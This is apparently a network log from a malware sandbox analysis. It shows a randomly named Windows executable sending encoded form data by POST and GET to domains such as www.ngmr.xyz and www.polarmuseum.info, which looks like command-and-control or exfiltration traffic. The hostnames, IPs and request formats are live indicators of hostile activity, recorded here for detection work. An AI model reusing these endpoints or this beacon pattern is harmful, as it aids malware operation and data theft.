Oct 22, 2024 05:39:43.633754969 CEST	665	OUT	POST /ntib/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.ngmr.xyz Origin: http://www.ngmr.xyz Connection: close Cache-Control: no-cache Content-Length: 233 Content-Type: application/x-www-form-urlencoded Referer: http://www.ngmr.xyz/ntib/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 33 69 70 49 49 4d 44 31 34 67 61 50 6f 56 66 51 4f 43 54 35 42 6f 7a 2b 78 67 2f 71 4f 37 47 37 70 2b 4f 55 63 53 57 69 71 58 34 68 44 68 5a 66 6b 77 64 6b 6d 4c 6c 74 37 47 36 6e 4d 50 6a 7a 32 6b 43 2f 51 69 56 33 36 4a 50 78 42 62 38 51 6b 67 32 72 58 79 37 71 68 61 76 51 64 55 63 66 51 72 6d 59 6c 32 53 63 6d 6b 4d 6d 54 76 48 50 4f 35 79 51 66 46 45 61 5a 62 4f 47 41 33 79 33 48 6a 31 44 58 36 58 2b 49 74 33 63 70 58 79 6d 4a 6c 48 5a 63 36 4b 6e 36 73 37 59 73 4a 6f 30 66 41 4c 53 4e 4f 47 53 30 6c 57 43 6c 31 58 47 49 36 54 35 47 7a 74 65 68 36 5a 32 53 30 7a 32 75 59 58 43 32 4a 33 6a 34 6a 4a 4a 74 61 43 61 32 32 2f 34 4e 46 44 2b 6c 51 44 75 6b 38 50 71 75 77 3d 3d Data Ascii: kT9p=3ipIIMD14gaPoVfQOCT5Boz+xg/qO7G7p+OUcSWiqX4hDhZfkwdkmLlt7G6nMPjz2kC/QiV36JPxBb8Qkg2rXy7qhavQdUcfQrmYl2ScmkMmTvHPO5yQfFEaZbOGA3y3Hj1DX6X+It3cpXymJlHZc6Kn6s7YsJo0fALSNOGS0lWCl1XGI6T5Gzteh6Z2S0z2uYXC2J3j4jJJtaCa22/4NFD+lQDuk8Pquw==
Oct 22, 2024 05:39:44.289541960 CEST	550	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 282 Accept-Ranges: bytes Date: Tue, 22 Oct 2024 04:03:14 GMT X-Varnish: 1435552220 Age: 0 Via: 1.1 varnish Connection: close X-Varnish-Cache: MISS Server: C2M Server v1.02 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49987	54.67.87.110	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:39:46.182544947 CEST	1678	OUT	POST /ntib/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.ngmr.xyz Origin: http://www.ngmr.xyz Connection: close Cache-Control: no-cache Content-Length: 1245 Content-Type: application/x-www-form-urlencoded Referer: http://www.ngmr.xyz/ntib/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 33 69 70 49 49 4d 44 31 34 67 61 50 6f 56 66 51 4f 43 54 35 42 6f 7a 2b 78 67 2f 71 4f 37 47 37 70 2b 4f 55 63 53 57 69 71 58 77 68 66 43 68 66 6b 58 70 6b 70 72 6c 74 78 6d 36 6d 4d 50 6a 75 32 6b 61 6a 51 69 52 4a 36 4c 6e 78 41 39 6f 51 67 68 32 72 43 43 37 71 6a 61 76 54 54 30 64 48 51 72 33 66 6c 33 75 63 6d 6b 4d 6d 54 74 66 50 61 34 79 51 64 46 45 64 4a 4c 4f 61 45 33 79 66 48 6e 67 30 58 36 44 75 49 63 58 63 71 33 69 6d 50 54 72 5a 64 61 4b 6c 37 63 37 41 73 4a 6b 6e 66 41 57 70 4e 4f 7a 61 30 6c 69 43 6c 79 54 61 58 36 61 75 59 41 74 76 32 36 56 47 62 30 72 31 6b 5a 44 78 6e 61 37 68 35 43 70 57 6c 76 75 32 31 56 65 65 4d 6d 50 46 35 57 4b 43 70 73 2b 6a 35 38 51 6e 58 62 53 46 34 70 65 48 62 44 44 50 53 7a 6b 42 2f 33 6e 68 62 45 53 72 50 34 5a 6c 2f 69 78 65 33 42 79 4b 34 63 78 56 6e 68 71 36 4a 76 75 2b 42 2f 48 38 33 2b 58 4f 6b 37 77 54 72 4d 46 64 53 33 2f 6f 45 45 61 62 44 4a 62 41 55 73 2f 54 58 51 52 4d 49 4e 62 76 41 39 6b 6b 53 63 30 41 36 76 54 34 69 6c 72 62 6a [TRUNCATED] Data Ascii: kT9p=3ipIIMD14gaPoVfQOCT5Boz+xg/qO7G7p+OUcSWiqXwhfChfkXpkprltxm6mMPju2kajQiRJ6LnxA9oQgh2rCC7qjavTT0dHQr3fl3ucmkMmTtfPa4yQdFEdJLOaE3yfHng0X6DuIcXcq3imPTrZdaKl7c7AsJknfAWpNOza0liClyTaX6auYAtv26VGb0r1kZDxna7h5CpWlvu21VeeMmPF5WKCps+j58QnXbSF4peHbDDPSzkB/3nhbESrP4Zl/ixe3ByK4cxVnhq6Jvu+B/H83+XOk7wTrMFdS3/oEEabDJbAUs/TXQRMINbvA9kkSc0A6vT4ilrbjunQ0H9jWfoD2aTtfv96ixIqOhBZmciOPrhsOVWChfuzFML67WG4mWfIJDJV3vNh8vU5vfuykQs3cStKOmODCozfi/JLCT+OKqkB6A5hX/4UVO47sYDwziuE4l2MMSnRAyAZ2MIH4kyrHm7xIw5qISYZsI8pXYPiaV13KR3+szuFmwI/QzmNSRLCDNFURjamgMiu5HYpWno7WuOzxZKYHsjN7CGC5VDpRXn+RvqqCYVlqe8Z+8xataADuNJB9FI4iLu2E77o4vznlSgRQiU2aSEam8zeYeDOZh771Us7pFz9CfQUDAH4wJ2N5OFyCxyhwysYyqc5QxK3YiD6yog1CRXkFFQrMfihijiRi62FAR6Hkq454xtpLxQc1pP8Lf8dEgjnLZuGhlzA8Mvs7a4o4LYGicNaHftpdSVzUySq3bu8pGY4LmNm2czrxHVcQIiERjzmioX+bE73YAPfq3Fz7ssdkkeiv3br7yrKLjLn2zrOBpMniSVOUh/kWVZBHyq5SOwV4s9rGNTkGMIsEM75pA2gH+soVTq/hWVBQrlvECRNseUsPv5Th1veg+fUZou1CGqv7MuaEw36wpXtTkbhYaTdMkRVFTT3h+CT/gLWOuN+24cMWOFor8bPwtHHlSAD1yzippvsdnnChX8PoOV1s/mBtrDsdrIb9PT [TRUNCATED]
Oct 22, 2024 05:39:46.844705105 CEST	550	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 282 Accept-Ranges: bytes Date: Tue, 22 Oct 2024 04:03:17 GMT X-Varnish: 1435552224 Age: 0 Via: 1.1 varnish Connection: close X-Varnish-Cache: MISS Server: C2M Server v1.02 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49988	54.67.87.110	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:39:48.735362053 CEST	402	OUT	GET /ntib/?in1Hf=rx3dZnMxlRvDbR&kT9p=6gBoL4716wSvqjL5PCL9Otm46h/RO+qAgNOYViOcikg4H3EcrAY/v4xx2gixZebSxES1QV9P/IXhCYI/sCqyeCK3gvy3e15BfbqdhxqVigAySd7dFKOwRmIIBq2hI0q3F0AcNNQ= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.ngmr.xyz Connection: close User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
Oct 22, 2024 05:39:49.394701004 CEST	550	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 282 Accept-Ranges: bytes Date: Tue, 22 Oct 2024 04:03:19 GMT X-Varnish: 1435552229 Age: 0 Via: 1.1 varnish Connection: close X-Varnish-Cache: MISS Server: C2M Server v1.02 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 74 69 62 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ntib/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49989	199.59.243.227	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:39:59.546803951 CEST	665	OUT	POST /rul7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.polarmuseum.info Origin: http://www.polarmuseum.info Connection: close Cache-Control: no-cache Content-Length: 209 Content-Type: application/x-www-form-urlencoded Referer: http://www.polarmuseum.info/rul7/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 46 75 4f 30 41 7a 52 43 75 2b 61 79 66 33 64 58 4a 6b 63 69 70 58 48 32 63 49 41 69 48 53 6d 78 32 43 32 56 52 48 52 33 4f 44 74 6e 56 34 36 35 6e 33 65 45 57 35 50 37 49 47 64 79 52 6c 6f 2b 67 59 6e 59 38 48 6e 48 4a 52 2f 59 41 4a 4a 31 79 48 45 71 34 70 73 77 59 2f 58 30 49 4d 4f 31 39 58 42 4c 73 57 76 2f 6d 50 4d 72 6d 56 2b 6c 30 56 71 7a 77 50 37 64 6f 77 2f 51 63 30 55 72 2b 54 4a 59 62 72 45 36 54 4b 5a 33 6f 70 55 4f 6e 54 69 49 72 76 43 6f 43 37 36 56 6b 64 43 32 6b 47 35 53 4d 6f 72 41 43 6d 62 33 35 39 4a 42 49 39 61 47 30 6b 6d 31 4c 73 66 52 33 4f 74 79 76 59 4e 76 56 44 75 67 64 4d 58 75 Data Ascii: kT9p=FuO0AzRCu+ayf3dXJkcipXH2cIAiHSmx2C2VRHR3ODtnV465n3eEW5P7IGdyRlo+gYnY8HnHJR/YAJJ1yHEq4pswY/X0IMO19XBLsWv/mPMrmV+l0VqzwP7dow/Qc0Ur+TJYbrE6TKZ3opUOnTiIrvCoC76VkdC2kG5SMorACmb359JBI9aG0km1LsfR3OtyvYNvVDugdMXu
Oct 22, 2024 05:40:00.196727991 CEST	1236	IN	HTTP/1.1 200 OK date: Tue, 22 Oct 2024 03:39:59 GMT content-type: text/html; charset=utf-8 content-length: 1134 x-request-id: 00f535aa-9e66-4c9d-894c-b1c9c6de65f3 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmNXdjFBPmqu8RpzuIRHCchRiJWUUT289Shovg/LwpqGdXuwaoGR+EO8Q7vhA1dR+92sI/rUNN/iWWY3Xz4rqQ== set-cookie: parking_session=00f535aa-9e66-4c9d-894c-b1c9c6de65f3; expires=Tue, 22 Oct 2024 03:55:00 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 6d 4e 58 64 6a 46 42 50 6d 71 75 38 52 70 7a 75 49 52 48 43 63 68 52 69 4a 57 55 55 54 32 38 39 53 68 6f 76 67 2f 4c 77 70 71 47 64 58 75 77 61 6f 47 52 2b 45 4f 38 51 37 76 68 41 31 64 52 2b 39 32 73 49 2f 72 55 4e 4e 2f 69 57 57 59 33 58 7a 34 72 71 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmNXdjFBPmqu8RpzuIRHCchRiJWUUT289Shovg/LwpqGdXuwaoGR+EO8Q7vhA1dR+92sI/rUNN/iWWY3Xz4rqQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 22, 2024 05:40:00.197283030 CEST	587	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDBmNTM1YWEtOWU2Ni00YzlkLTg5NGMtYjFjOWM2ZGU2NWYzIiwicGFnZV90aW1lIjoxNzI5NTY4ND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49990	199.59.243.227	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:02.088193893 CEST	689	OUT	POST /rul7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.polarmuseum.info Origin: http://www.polarmuseum.info Connection: close Cache-Control: no-cache Content-Length: 233 Content-Type: application/x-www-form-urlencoded Referer: http://www.polarmuseum.info/rul7/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 46 75 4f 30 41 7a 52 43 75 2b 61 79 65 58 74 58 50 44 6f 69 76 33 48 33 43 34 41 69 64 69 6d 39 32 43 36 56 52 47 56 64 4e 77 4a 6e 55 63 32 35 6d 32 65 45 58 35 50 37 43 6d 64 33 63 46 6f 31 67 59 69 72 38 47 33 48 4a 52 62 59 41 4e 46 31 79 77 59 70 71 4a 73 2b 51 66 58 71 57 38 4f 31 39 58 42 4c 73 57 72 5a 6d 50 45 72 6d 6c 4f 6c 6d 6b 71 30 76 2f 37 65 76 77 2f 51 59 30 55 76 2b 54 4a 6d 62 72 30 55 54 49 52 33 6f 74 59 4f 6e 48 2b 50 38 2f 44 74 63 37 37 45 70 2f 32 38 71 33 41 73 4c 2b 7a 52 44 57 72 71 31 72 49 62 55 4f 61 6c 6d 30 47 33 4c 75 48 6a 33 75 74 59 74 59 31 76 48 55 69 48 53 34 79 4e 75 4e 44 76 58 4a 67 4c 4a 51 70 7a 6f 63 66 4e 49 65 7a 57 39 77 3d 3d Data Ascii: kT9p=FuO0AzRCu+ayeXtXPDoiv3H3C4Aidim92C6VRGVdNwJnUc25m2eEX5P7Cmd3cFo1gYir8G3HJRbYANF1ywYpqJs+QfXqW8O19XBLsWrZmPErmlOlmkq0v/7evw/QY0Uv+TJmbr0UTIR3otYOnH+P8/Dtc77Ep/28q3AsL+zRDWrq1rIbUOalm0G3LuHj3utYtY1vHUiHS4yNuNDvXJgLJQpzocfNIezW9w==
Oct 22, 2024 05:40:02.733761072 CEST	1236	IN	HTTP/1.1 200 OK date: Tue, 22 Oct 2024 03:40:01 GMT content-type: text/html; charset=utf-8 content-length: 1134 x-request-id: ca6fa42a-41a0-4d0e-82ef-538e71991792 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmNXdjFBPmqu8RpzuIRHCchRiJWUUT289Shovg/LwpqGdXuwaoGR+EO8Q7vhA1dR+92sI/rUNN/iWWY3Xz4rqQ== set-cookie: parking_session=ca6fa42a-41a0-4d0e-82ef-538e71991792; expires=Tue, 22 Oct 2024 03:55:02 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 6d 4e 58 64 6a 46 42 50 6d 71 75 38 52 70 7a 75 49 52 48 43 63 68 52 69 4a 57 55 55 54 32 38 39 53 68 6f 76 67 2f 4c 77 70 71 47 64 58 75 77 61 6f 47 52 2b 45 4f 38 51 37 76 68 41 31 64 52 2b 39 32 73 49 2f 72 55 4e 4e 2f 69 57 57 59 33 58 7a 34 72 71 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rmNXdjFBPmqu8RpzuIRHCchRiJWUUT289Shovg/LwpqGdXuwaoGR+EO8Q7vhA1dR+92sI/rUNN/iWWY3Xz4rqQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 22, 2024 05:40:02.733792067 CEST	587	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2E2ZmE0MmEtNDFhMC00ZDBlLTgyZWYtNTM4ZTcxOTkxNzkyIiwicGFnZV90aW1lIjoxNzI5NTY4ND

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49991	199.59.243.227	80	5776	C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Timestamp	Bytes transferred	Direction	Data
Oct 22, 2024 05:40:04.640197992 CEST	1702	OUT	POST /rul7/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.polarmuseum.info Origin: http://www.polarmuseum.info Connection: close Cache-Control: no-cache Content-Length: 1245 Content-Type: application/x-www-form-urlencoded Referer: http://www.polarmuseum.info/rul7/ User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14 Data Raw: 6b 54 39 70 3d 46 75 4f 30 41 7a 52 43 75 2b 61 79 65 58 74 58 50 44 6f 69 76 33 48 33 43 34 41 69 64 69 6d 39 32 43 36 56 52 47 56 64 4e 77 42 6e 55 76 2b 35 6e 56 32 45 46 4a 50 37 4f 47 64 32 63 46 6f 6f 67 59 61 6e 38 44 76 35 4a 54 7a 59 42 75 4e 31 37 6c 73 70 68 4a 73 2b 53 66 58 33 49 4d 4f 61 39 58 77 41 73 57 37 5a 6d 50 45 72 6d 6a 69 6c 78 6c 71 30 38 76 37 64 6f 77 2f 6d 63 30 55 48 2b 54 51 64 62 71 41 71 51 38 6c 33 72 4e 49 4f 6d 30 57 50 2f 66 44 76 49 62 37 63 70 2f 72 6d 71 32 74 56 4c 2b 76 2f 44 52 4c 71 32 4e 56 79 42 4e 76 37 2f 45 4f 79 4c 76 6a 31 2f 65 70 42 33 70 46 7a 55 47 57 31 4d 61 36 37 6d 62 58 6e 58 36 74 35 41 57 56 69 69 62 61 53 4f 65 32 62 71 79 6f 46 56 43 67 71 45 6d 38 51 52 61 39 78 5a 59 72 6d 2b 2f 46 6f 44 38 7a 32 73 67 6b 64 36 6a 74 49 4d 75 4a 4e 4a 4d 62 64 61 2f 4b 32 63 32 61 4a 48 57 61 4d 51 43 78 62 6f 58 6c 35 31 66 31 69 52 46 32 58 75 6a 65 2b 77 58 42 62 78 49 36 2b 36 37 70 44 61 57 41 37 67 6a 38 63 35 41 6f 43 72 6a 37 78 5a 45 45 39 48 [TRUNCATED] Data Ascii: kT9p=FuO0AzRCu+ayeXtXPDoiv3H3C4Aidim92C6VRGVdNwBnUv+5nV2EFJP7OGd2cFoogYan8Dv5JTzYBuN17lsphJs+SfX3IMOa9XwAsW7ZmPErmjilxlq08v7dow/mc0UH+TQdbqAqQ8l3rNIOm0WP/fDvIb7cp/rmq2tVL+v/DRLq2NVyBNv7/EOyLvj1/epB3pFzUGW1Ma67mbXnX6t5AWViibaSOe2bqyoFVCgqEm8QRa9xZYrm+/FoD8z2sgkd6jtIMuJNJMbda/K2c2aJHWaMQCxboXl51f1iRF2Xuje+wXBbxI6+67pDaWA7gj8c5AoCrj7xZEE9HkQSleEciiTSaBwM7NKvEKVhdLX4RnuAJMDhYkfqMlHiKPFs8RJt/YYbkFvfy620GpWblV2K8zfzkQRSHLbNevYlAanYBrKtxdPQAn+szA2alddxlFgf9XjKPahsi1wxvhR0cjENYP4bI2Gwt2lENkef0GxoLzqohM8P1jzJyBqpqtzbZOpRKEs3FD+V/+nOCezlCi4zHesGsSuTmA2YOKRdCAjUImrKcU6vj1C5RtHIc6DgYuBvguJKv/jJor2/rlSF8XR8XzSHwe/d8IQoc/Jma/TcohY9SAdBW6tC2SVgqQRlPk+haAYtMv/ZrWQB8X43XzT17KAn6Tp7DknVP3on3jgDQhW/kCgW6LwclcunFT+zDN79xFbhOY4rc1eHBQ+4FkYW6dCR4ofvpqEAMxCCFrlSQDSHMCk7T8NlSyYuhFo0fLhgAGO9qzaaZXM/qjI46xR6zIaRdBFqPEypsbnKVKOgMWJl+jpeALNTe4XGolIfmzXByP7avXcjge1gYPN0MWbODMGnsauhAF8jma8X4ZtYD+12WP0zkTU4Zgr7vLlO1bqgY